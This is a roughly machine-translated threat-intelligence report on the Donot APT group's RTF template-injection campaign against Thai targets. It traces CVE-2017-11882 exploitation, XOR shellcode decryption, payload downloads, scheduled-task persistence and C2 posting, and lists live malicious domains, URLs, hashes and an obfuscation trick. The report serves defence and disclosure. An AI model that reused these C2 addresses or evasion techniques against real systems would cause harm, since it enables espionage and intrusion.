Shulou(Shulou.com)06/03 Report--

This article is about how to understand Donot organizations using RTF templates to inject attacks against surrounding areas. I think it is very practical, so I share it with you. I hope you can get something after reading this article. Let's take a look at it.

Overview

Donot "belly brain worm" (APT-C-35) is an APT organization suspected to have a South Asian background, which mainly targets government agencies of neighboring countries for cyber attacks, usually for the purpose of stealing sensitive information. The organization has the ability to attack both Windows and Android platforms.

Recently, Qianxin threat Intelligence Center Red Raindrop in the daily threat hunting found that the Donot APT organization has attacked frequently recently. It makes use of malicious RTF template injection and formula editing loopholes to exploit samples to carry out many attacks on neighboring countries and regions. According to the red raindrop researchers' tracking analysis, the Donot attack has the following characteristics:

In this attack, Donot organizations began to use\ *\ template target control words in RTF format documents to load remote malicious template files. This method has a good anti-killing effect, and there is almost no soft killing when the samples are uploaded to VT for the first time.

The captured samples use "Royal Thai Navy Command and staff course No. 82", "OPS check details", "OPS requirements", "Ministry of Defense copy" and other titles as bait documents to carry out attacks. OPS is suspected to be an oil and gas company based in Thailand. Based on the title of the bait, it is speculated that the group is suspected of launching attacks against Thailand.

This event is similar to the attack we disclosed in February, in which the Payload is loaded with multiple layers of decryption and mostly stored in the "jack" directory of the organization's server.

No domestic impact has been found, and all products based on the threat intelligence data of Qianxin threat Intelligence Center, including threat Intelligence platform (TIP), SkyEye Advanced threat Detection system, NGSOC, Chianxin situation Awareness, etc., have supported the accurate detection of the attack activities of this APT attack group.

Sample information

Most of the samples captured this time use Thailand-related information as the bait title, and some of the sample information is shown in the following table:

File name

MD5

OPS_requirements.doc

8cc87eb3667aecc1bd41018f00aca559

OPS Clearance Details.doc

B7e07104bc65619b55431f6cbaaaea29

Royal Thai Navy 82nd Command and Staff course.doc

D4b45f7a937139e05f386a8ad0aba04e

Contract copy-11 Feb 21.doc

6275908396d4a55c1ad8a21a82e6ada8

MOD_Copy.doc

5fdcbb85733f9e8686d582b2f1459961

Almost all samples are attacked by RTF loading with formula editing vulnerabilities, and the stored remote links are obfuscated, as shown in the following figure:

This method is extremely effective in avoiding killing. When the sample is uploaded to VT for the first time, there are almost no soft checks:

When the sample runs, it will attempt to get the file from the remote template to load and execute, and when the remote template with the formula editor vulnerability is successfully loaded and exploited, it will be downloaded and downloaded through multiple layers of decryption to execute the malicious load. The overall execution process is shown in the following figure:

Detailed analysis

Take the 5fdcbb85733f9e8686d582b2f1459961 sample as an example, the sample information is as follows:

File name

MOD_Copy.doc

MD5

5fdcbb85733f9e8686d582b2f1459961

file format

RTF

Remote template file address

Http [:] / / worldoption.xyz/jack/6Tuni6MNu5EMiSHjVywGxKsA1KnRi8Se.do

The file uses the\ *\ template target control character, and the parameter is the url obfuscated unicode string.

Use\ uN? in RTF format. Represents a unciode character. \ u followed by a signed 16-bit decimal integer value followed by a placeholder, with? It means. If N is greater than 32767, it is expressed as a negative number. Examples of confusion resolution are as follows:

L "h" = = 0x0068 =-(- 0x0068) = =-(0xFFFF+1-0x68) =-65432.

After the sample runs, you can clearly see that you are trying to load the remote template file.

The server where the remote template files are stored is an open directory containing several malicious files, as shown below:

The loaded remote template file is a sample with formula editing vulnerabilities. The basic information is as follows:

File name

6Tuni6MNu5EMiSHjVywGxKsA1KnRi8Se.dot

MD5

87f2ff9f2cb1cc3be9cc6d2adbc9efcd

Vulnerability exploitation

CVE-2017-11882

After successful exploitation, the vulnerability will be redirected to shellcode for execution, and XOR decryption will be performed first:

After decryption, the file will be downloaded from "http [:] / / worldoption.xyz/jack/6Tuni6MNu5EMiSHjVywGxKsA1KnRi8Se" via URLDownloadToCacheFileA. The file is encrypted shellcode data

After the download is successful, the decryption operation is performed. The decryption algorithm is to reverse and merge or 0x64 0xDEE89A75 until the match is reached, and whether the header is 0x90. If it is equal to 0x90, proceed to the next step.

XOR AB decrypts again

After that, the driver files of Kaspersky and avast,nod32,MacFree,360 antivirus software are used to detect whether there is anti-software.

0xD29 bytes shellcode after detecting XOR decryption with 0xFE again, and then XOR 0xCE decrypts 0x100 bytes

After the decryption is successful, go to the second section of shellcode and download the file from http://worldoption.xyz/jack/6Tuni6MNu5EMiSHjVywGxKsA1KnRi8Se.dat to% Appdata%\\ wingui.dll via URLDownloadToFileA and repair the DOS header

Then download the file from http://worldoption.xyz/jack/6Tuni6MNu5EMiSHjVywGxKsA1KnRi8Se.doc to% Temp%\\ doucument.doc via URLDownloadToFileA to confuse the victim.

After the download is successful, create the scheduled task to run wingui.dll every three minutes and call its export function HPMG.

The scheduled task created is shown in the following figure:

The released wingui.dll is a common malicious code used by Donot organizations. The message is as follows:

File name

6Tuni6MNu5EMiSHjVywGxKsA1KnRi8Se.dat

MD5

17d0da6f523a7463c3e9db424f95ab42

Time stamp

Monday, 01.03.2021 07:16:50 UTC

Export DLL name

Mvcupdte.dll

After the planned task is loaded successfully, the export function HPMG will be called first of all to delay by judging the difference and parameters of time64 twice.

Create a mutex for "WinMsCompany" to ensure that only one instance is running.

Use wmic to detect the Vmware virtual machine environment.

Get user name, computer name, use WQL statement to query system properties, query CPU information, query hardware information

Query the file information of "\\ Program Files"\\ Program Files (x86)" under the system disk

System information obtained by stitching and formatting

Data coding and data field splicing

First request wiki twice, then POST request saltpodium.xyz / vocha/ogo, and download the data to C:\ ProgramData\ MJuego\ JacaPM.dll.

Use rundll32 to run JacaPM.dll 's export function HWG and create a scheduled task.

Write the windows.bat incoming parameters in the temp directory and run them, unload the task schedule, and delete themselves

At the same time, a number of malicious files are stored in the queen directory of the same main domain name. It is found that it is 64 version of malicious code, and the function code is consistent with 32-bit program.

Traceability correlation

Qianxin threat intelligence center red raindrop team combined with the threat intelligence center ALPHAti.qianxin.com platform, the attack methods, malicious code and other aspects of correlation analysis found that there is a high similarity between the attack and donot. In the "summary and analysis of APT organization attack activities in South Asia in January 2021", the belly bug sample c92901f2ef13374f4afd950d840e02c1 has the consistency of function and payload execution flow, and in this attack, the hidden function is added to the DLL file, replacing the virtual machine sandbox detection method, indicating that the belly bug organization is constantly updating its attack weapons.

According to the request domain name cachepage.icu of the sample d4b45f7a937139e05f386a8ad0aba04e, it can be associated with the new sample 7a6559ff13f2aecd89c64c1704a68588, which is injected into shellcode by thread to download the subsequent payload.

Summary

Donot is a long-term active APT organization, with both Windows and Andorid dual-platform attack capabilities, and constantly updates its weapons library. This is the first time that RTF loads remote template files to avoid killing, and the effect is excellent. Qianxin threat Intelligence Center will continue to track the organization's attacks.

Qianxin threat Intelligence Center once again reminds enterprise users that strengthening the security awareness training of employees is the most important link in the construction of enterprise information security, and if necessary, enterprise users can build situational awareness, improve asset management and continuous monitoring capabilities, and actively introduce threat intelligence to defend against such attacks as far as possible.

At present, all products based on threat intelligence data from Chianxin threat Intelligence Center, including threat Intelligence platform (TIP), SkyEye Advanced threat Detection system, NGSOC, Chianxin situation Awareness, etc., have supported the accurate detection of the attack activities of this APT attack group.

This is how to understand Donot organizations using RTF templates to inject attacks against surrounding areas. The editor believes that there are some knowledge points that we may see or use in our daily work. I hope you can learn more from this article. For more details, please follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.